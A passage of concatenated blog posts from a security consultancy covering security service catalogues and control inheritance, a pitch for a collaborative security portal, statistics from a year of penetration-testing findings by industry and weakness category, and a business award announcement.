You don’t need to check the security of the re-used components used by those projects over and over again.
For example, you might use an on-premise Active Directory instance with which identity and access management is performed; or maybe it’s hosted in Azure. Perhaps you use Okta, a cloud based SaaS Identity and Access Control service. For logging and monitoring, you might use Splunk or AlienVault as your organisation-wide security monitoring service, or maybe you outsource it to AlertLogic. Whatever. Perform your due diligence, and add it to your catalogue.

Once it’s in your catalogue, you should assess it annually, as part of your business as usual security practices — firstly for risk, secondly at a technical level to validate your risk findings, and finally in a market context to see if there are better controls now available to address the same risk issue.

I’ve been part of a small team building a security certification and accreditation program from scratch, and have seen that the only way to scale the certification process, and ensure sufficient depth of security review across the multitude of systems present in most organisations, is to make sure unnecessary re-hashing of solution reviews is minimised, using these “control inheritance” principles.

Thirdly, develop a Security Requirements Document (SRD) template based upon your Security Services Catalogue. This is where you define the services available and requirements for your project teams, and make the choices really easy for them. Either use the services in the security services catalogue, or comply with all the requirements of the Password Policy, Access Control Policy, Encryption Policy, etc. After a time, your Project Lifecycle will mature, your Security Services will become more standardised and robust, and your life will become significantly easier.

Lastly, get involved with your project teams. Your project teams are not security experts, you are. And the sooner you make it easy for them to get what resources and expertise you have available, the sooner they can make the best decisions for your organisation, the more secure your organisation will be. Make the secure way the easy way, and everyone’s life will be a little more comfortable.


Article by Ben Waters, Senior Security Advisor, Hivint

Security Collaboration — The Problem and Our Solution


Colleagues, the way we are currently approaching information security is broken.

This is especially true with regard to the way the industry currently provides, and consumes, information security consulting services. Starting with Frederick Winslow Taylor’s “Scientific Management” techniques of the 1890s, consulting is fundamentally designed for companies to get targeted specialist advice to allow them to find a competitive advantage and beat the stuffing out of their peers.

But information security is different. It is one of the most wildly inefficient things to try to compete on, which is why most organisations are more than happy to say that they don’t want to compete on security (unless their core business is, actually, security).

Why is it inefficient to compete on security? Here are a couple of reasons:

Customers don’t want you to.Customers quite rightly expect sufficient security everywhere, and want to be able to go to the florist with the best flowers, or the best priced flowers, rather than having to figure out whether that particular florist is more or less secure than the other one.

No individual organisation can afford to solve the problem.With so much shared infrastructure, so many suppliers and business partners, and almost no ability to recoup the costs invested in security, it is simply not cost-viable to throw the amount of money really needed at the problem. (Which, incidentally, is why we keep going around in circles saying that budgets aren’t high enough — they aren’t, if we keep doing things the way we’re currently doing things.)

Some examples of how our current approach is failing us:

We are wasting money on information security governance, risk and compliance

There are 81 credit unions listed on the APRA website as Authorised Deposit-Taking Institutions. According to the ABS, in June 2013 (the most recent data), there were 77 ISPs in Australia with over 1,000 subscribers. The thought that these 81 credit unions would independently be developing their own security and compliance processes around security, and the 77 ISPs are doing the same, despite the fact that the vast majority of their risks and requirements are going to be identical as their peers, is frightening.

The wasted investment in our current approach to information security governance is extreme. Five or so years ago, when companies started realising that they needed a social media security policy, hundreds of organisations engaged hundreds of consultants, to write hundreds of social media security policies, at an economy-wide cost of hundreds of thousands, if not millions, of dollars. That. Is. Crazy.

We need to go beyond “not competing” and cross the bridge to “collaboration”. Genuine, real, sharing of information and collaboration to make everyone more secure.

We are wasting money when getting technical security services

As a technical example, I met recently with a hospital where we will be doing some penetration testing. We will be testing one of their off-the-shelf clinical information system software packages. The software package is enormous — literally dozens of different user privilege levels, dozens of system inter-connections, and dozens of modules and functions. It would easily take a team of consultants months, if not a year or more, to test the whole thing thoroughly. No hospital is going to have a budget to cover that (and really, they shouldn’t have to), so rather than the 500 days of testing that would be comprehensive, we will do 10 days of testing and find as much as we can.

But as this is an off-the-shelf system, used by hundreds of hospitals around the world, there are no doubt dozens, maybe even hundreds, of the same tests happening against that same system this year. Maybe there are 100 distinct tests, each of 10 days’ duration being done. That’s 1,000 days of testing — or more than enough to provide comprehensive coverage of the system. But instead, everyone is getting a 10 day test done, and we are all worse off for it. The hospitals have insecure systems, and we — as potential patients and users of the system — wear the risk of it.

The system is broken. There needs to be collaboration. Nobody wants a competitive advantage here. Nobody can get a competitive advantage here.

So what do we do about it?

There is a better way, and Hivint is building a business and a system that supports it. This system is called “The Colony”.

It is an implementation of what we’re calling “Community Driven Security”. This isn’t crowd-sourcing but involves sharing information within communities of interest who are experiencing common challenges.

The model provides benefits to the industry both for the companies who today are getting consulting services, and for the companies who can’t afford them:

Making consulting projects cheaper the first time they are done.If a client is willing to share the output of a project (that has, of course, been de-sensitised and de-identified) then we can reduce the cost of that consulting project by effectively “buying back” the IP being created, in order to re-use it. Clients get the same services they always get; and the sharing of the information will have no impact on their security or competitive position. So why not share it and pocket the savings?

Making that material available to the community and offering an immediate return on investment.Through our portal — being launched in June — for a monthly fee of a few hundred dollars, subscribers will be able to get access to all of that content. That means that for a few hundred dollars a month, a subscriber will be able to access the output from hundreds of thousands of dollars worth of projects, every month.

Making subsequent consulting projects cheaper and faster. Once we’ve completed a certain project type — say, developing a suite of incident response scenarios and quick reference guides — then the next organisation who needs a similar project can start from that and pay only for the changes required (and if those changes improve the core resources, those changes will flow through to the portal too).

Identifying GRC “Zero Days”.Someone, somewhere, first identified that organisations needed a social media security policy, and got one developed. There was probably a period of months, or even years, between that point and when it became ubiquitous. Through the portal, organisations who haven’t even contemplated that such a need may exist, would be able to see that it has been identified and delivered, and if they want to address the risk before it materialises for them, they have the chance. And there is no incremental cost over membership to the portal to grab it and use it.

Supporting crowd-funding of projects. The portal will provide the ability for organisations to effectively ‘crowd fund’ technical security assessments against software or hardware that is used by multiple organisations. The maths is pretty simple. If two organisations are each looking at spending $30,000 to test System X, getting 15 days of testing for that investment, if they each put $20,000 in to a central pool to test System X, they’ll get 20 days of testing and save $10,000 each. More testing, for lower cost, resulting in better security. Everyone wins.

What else is going in to the portal?

We have a roadmap that stretches well into the future. We will be including Threat Intelligence, Breach Intelligence, Managed Security Analytics, the ability to interact with our consultants and ask either private or public questions, the ability to share resources within communities of interest, project management and scheduling, and a lot more. Version 1 will be released in June 2015 and will include the resource portal (ie the documents from our consulting engagements), Threat Intelligence and Breach Intelligence plus the ability to interact with our consultants and ask private or public questions.

“Everyone” can’t win. Who loses?

The only people that will potentially lose out of this, are security consultants. But even there we don’t think that will be the case. It is our belief that the market is supply side constrained — in other words, we believe we are going to be massively increasing the ‘output’ for the economy-wide consulting investment in information security; but we don’t expect companies will spend less (they’ll just do more, achieving better security maturity and raising the bar for everyone).

So who loses? Hopefully, the bad guys, because the baseline of security across the economy gets better and it costs them more to break in.

Is there a precedent for this?

The NSW Government Digital Information Security Policy has as a Core Requirement, and a Minimum Control, that “a collaborative approach to information security, facilitated by the sharing of information security experience and knowledge, must be maintained.”

A lot of collaboration on security so far has been about securing the collaboration process itself. For example, that means health organisations collaborating to ensure that health data flowing between the organisations is secure throughout that collaborative process. But we believe collaboration needs to be broader: it needs to not just be about securing the collaborative footprint, but rather securing the entire of each other’s organisations.

Banks and others have for a long time had informal networks for sharing threat information, and the CISOs of banks regularly get together and share notes. The CISOs of global stock exchanges regularly get together similarly. There’s even a forum called ANZPIT, the Australian and New Zealand Parliamentary IT forum, for the IT managers of various state and federal Parliaments to come together and share information across all areas of IT. But in almost all of these cases, while the meetings and the discussions occur, the on-the-ground sharing of detailed resources happens much less.

The Trusted Information Sharing Network (TISN) has worked to share — and in many cases develop — in depth resources for information security. (In our past lives, we wrote many of them). But these are $50K-100K endeavours per report, generally limited to 2 or 3 reports per year, and generally provide a fairly heavy weight approach to the topic at hand.

Our belief is that while “the 1%” of attacks — the APTs from China — get all the media love, we can do a lot of good by helping organisations with very practical and pragmatic support to address the 99% of attacks that aren’t State-sponsored zero-days. Templates, guidelines, lists of risks, sample documents, and other highly practical material is the core of what organisations really need.

What if a project is really, really sensitive?

Once project outcomes are de-identified and de-sensitised, they’re often still very valuable to others, and not really of any consequence to the originating company. If you’re worried about it, you can review the resources before they get published.

So how does it work?

You give us a problem, we’ll scope it, quote it, and deliver it with expert consultants. (This part of the experience is the same as your current consulting engagements)
We offer a reduced fee for service delivery (percentage reduction dependent on re-usability of output).
Created resources, documents, and de-identified findings become part of our portal for community benefit.

Great. Where to from here?

There are two things we need right now:

Consulting engagements that drive the content creation for the portal. Give us the chance to pitch our services for your information security consulting projects. We’ve got a great team, the costs are lower, and you’ll also be helping our vision of “community driven security” become a reality. Get in touch and tell us about your requirements to see how we can help.
Sign up for the portal (you’ve done this bit!) and get involved — send us some questions, download some documents, subscribe if you find it useful.
And of course we’d welcome any thoughts or input. We are investing a lot into this, and are excited about the possibilities it is going to create.


Article by Nick Ellsmore, Chief Apiarist, Hivint

Hivint’s 2016–17 Tech Year in Review

Over the course of the 2016–17 financial year, Hivint completed 117 technical security assessments ranging from source code reviews through to whole of organisation penetration tests for our clients.

One of our driving values is collaboration, so in this spirit, we wish to share statistics and observations about our year.

We hope that by sharing this information, we’ll provide an insight into the security assurance activities delivered by an Australian cyber-security consultancy. We also hope that over time, we’ll be able to identify and present trends in the evolving nature of assurance activities — supported by clear facts and figures as opposed to general observations.

Engagements

Our security assessments were delivered to Australian and international clients across a wide-range of industries, with the following chart providing the breakdown across industries.


It’s clear that our main clients for technical security assurance activities are positioned within the Finance, Government and Technology sectors, with approximately twice as many engagements performed in each of these sectors compared to the remainder. We believe that this can be attributed to:

  • The Finance industry being one of the more ‘security mature’ industries, and one that demands a high level of security assurance due to being a common attack target because of the potential of direct financial gain possible
  • The Technology industry maintaining a greater overall understanding of technical security risks and (similar to the Finance industry) demanding a high level of security assurance
  • The Government through its sheer size, and the need to obtain general periodic security assurance

The engagements completed varied greatly in the work effort, target and type of assessment performed. The 117 assessments undertaken ranged from short, single-day vulnerability assessments (intended to provide a limited, final quality assurance on a new system) to multi-month organisation wide penetration testing and vulnerability assessment activities. Engagements included configuration reviews, testing of hardware / IoT devices, mobile and web applications, wireless and network infrastructure, source code reviews and more, with web application testing being the most common assessment type (being the primary focus of 50 of the 117 assessments completed).

Findings

Through the 117 assessments undertaken, a total of 720 findings were identified. Findings which were deemed to not present a security risk (i.e. informational findings) are not included in this total.

To assess the risk of our security findings, Hivint employs an ISO 31000 aligned risk assessment framework, and employed common likelihood, impact and overall risk criteria. The table below provides a breakdown of the number and severity of findings.


The below chart provides the breakdown of the number of findings (from the Extreme down to Very Low risk severity) for each of the different industries.


Based on these ‘raw’ numbers, it’s clear that the majority of findings are presented as Low risks, with the number of findings tapering off as the risk severity increases. It is acknowledged however that these ‘raw’ numbers may be skewed due to the number and type of engagements performed for that industry — such that if the technology sector underwent the most engagements, then it seems reasonable that it would have the highest number of findings. To reduce this potential skew, the following chart has been provided which includes an average of the number of findings (for each risk rating) across the number of engagements completed for all clients in that industry sector.


With this normalised data, all industry sectors (except one) followed a fairly predictable pattern of having higher numbers of lower-risk issues, and lower numbers of high-risk issues. More mature industry sectors (such as Financial Services and Technology) showed a much more rapid drop-off as the risk of the issues increased. I.e. for these sectors, High risk issues as a proportion of all issues presented at a much lower rate, with the ratio of Low:High issues in Finance, Technology, Legal and some others being roughly 10–20:1. This is contrasted with Sports which is closer to 2:1.

We interpret this as a reflection of the focus over recent years in closing off the higher risk issues in industries such as Finance and Technology and the higher frequency with which tests have been completed against these systems.

A clear outlier in the total data set is the Retail sector which presented a higher average number of High risks than Low risks. Whilst on general we believe that the Retail sector doesn’t have the security maturity as sectors such as Finance and Technology, we expect that this level of High risk findings is an anomaly and we will be interested to review next year’s data to identify whether a similar ration of Low:High findings is present.

Monthly Breakdown

Across the year, there is a clear set of peaks by way of the number of security assessment engagements, and subsequently number of findings identified each month. The below chart presents the number of engagements and findings per month across the 2016–17 period.


The data in the above chart aligns with our experiences in working in this industry- something that we’ve seen in place for more than 10 years. The peak periods are the leadup to the end of the financial year and the calendar year, which we attribute primarily to:

  • The need to complete projects prior the end of a forecast cycle (which in Australia is largely prior to the Christmas holiday period — “I need the project in by Christmas”), and
  • The need to expend budget prior to the end of a financial cycle (which in Australia is primarily end of June).

We will be interested to see if the number of engagements across approximately November 2017 through to March / April 2018 increases as a result of entities seeking increased security assurance prior to mandatory data breach notification[i] requirements coming into effect in February 2018 (applicable to entities subject to the Privacy Act 1988).

Common Weaknesses

To categorise our findings, we follow the Web Application Security Consortium (WASC) Threat Classifications[ii] where possible. This allows us to remain consistent between engagements, and provides for a transparent view of categorisation.

Out of 720 findings across WASC categories, the top 10 WASC categories comprised 88% all findings. The below chart visualises the top 10 weakness categories that we found across the year:


The most common type of risk found was Application Misconfiguration, which is a fairly wide issue category — usually encountered when an application is not configured with security in mind — and includes issues such as a lack of security headers, or having default files disclose configuration details and application version information. The second most common was Insufficient Authentication, which can be seen when issues such as default credentials are in use, or if the application suffers from username enumeration.

Interestingly, the majority findings relate to the insecure configuration of the target system (application, operating system, network device etc.), or failing to keep the system patched to address known security issues. In a large number of our assessments, the targets are off the shelf systems that do not include any custom development by the implementing organisation, only configuration. Whilst it is recognised that some of these security findings are outside of the control of the implementing organisation (vulnerabilities in the software itself), in the majority of instances if the implementing organisation was to:

  1. Follow vendor implementation guidance for secure configuration of the system (as well as any underlying infrastructure), and

2. Keep the system patched,

Then many of these findings would not exist.

Conclusion

We are clearly not to the point where the need for security assurance activities through hands-on testing and analysis of systems is unnecessary due to security being sufficiently ‘baked in’ to the overall solution.

Anecdotally, we do see that organisations which invest in security earlier in the lifecycle (e.g. defining solution security requirements, performing security threat modelling, undertaking security design reviews and code assessments) result in fewer and less severe findings when implementation testing (such as a vulnerability assessment) is performed against the solution. Those that first introduce security into the project lifecycle through a vulnerability assessment a week before go-live are typically the ones with the greatest number (and higher severity) of findings.

Additionally, as the industry progresses to the use of more and more commoditised services (e.g. Software as a Service) and the number of bespoke applications reduces as a percentage of all deployments, we expect that the number of security ‘misconfigurations’ will increase as a percentage of overall findings due to a reduction in unique security vulnerabilities. We also hope that such a migration will also reduce the number of overall findings through our engagements, as an increasing number of ‘secure by default’ settings become ingrained into offerings.

Finally, we plan to keep an eye on developments across industry and relevant governing legislation such as the mandatory breach reporting in Australia, and impacts on Australian entities stemming from the EU’s General Data Protection Regulation. We expect that these macro-level changes will filter through the number and types of security activities (including security assessments) that are executed, and it will be interesting to see if next year’s data-set indicates any impact from these types of initiatives.

We hope that the data presented here has provided you with some useful insight into Hivint’s 2016–17 technical assessment activities. If you would like to see more material that we’ve shared from our engagements — such as security test cases, cheat sheets, common security findings and more — sign up for a free subscription to our collaboration portal at https://portal.securitycolony.com/register.


Contributors: Aaron Doggett, Sam Reid, Cameron Stokes, and Jordan Sinclair


[i] Introduced through the Privacy Amendment (Notifiable Data Breaches) Act 2017 and defined as the Notifiable Data Breaches scheme. Additional details here: https://www.oaic.gov.au/engage-with-us/consultations/notifiable-data-breaches/

[ii] http://projects.webappsec.org/w/page/13246978/Threat%20Classification

Hivint in the Telstra Business Awards


Hivint entered the Telstra Business Awards in early 2017, and after a rigorous selection process, won the Victorian New Business Award, and the Victorian Business of the Year.

Check out the acceptance speeches below:

Craig and Nick accepting the Telstra Victorian New Business Award.

Craig and Nick accepting the Telstra Victorian Business of the Year Award.

Some more photos from the evening, with hundreds of passionate people from all types of businesses in attendance.

The Hivint team in attendance

Craig tearing up (just a little)

Craig Searle’s heartfelt acceptance speech

Next are the National Telstra Business Awards, competing against some of Australia’s highest performing businesses. See you there!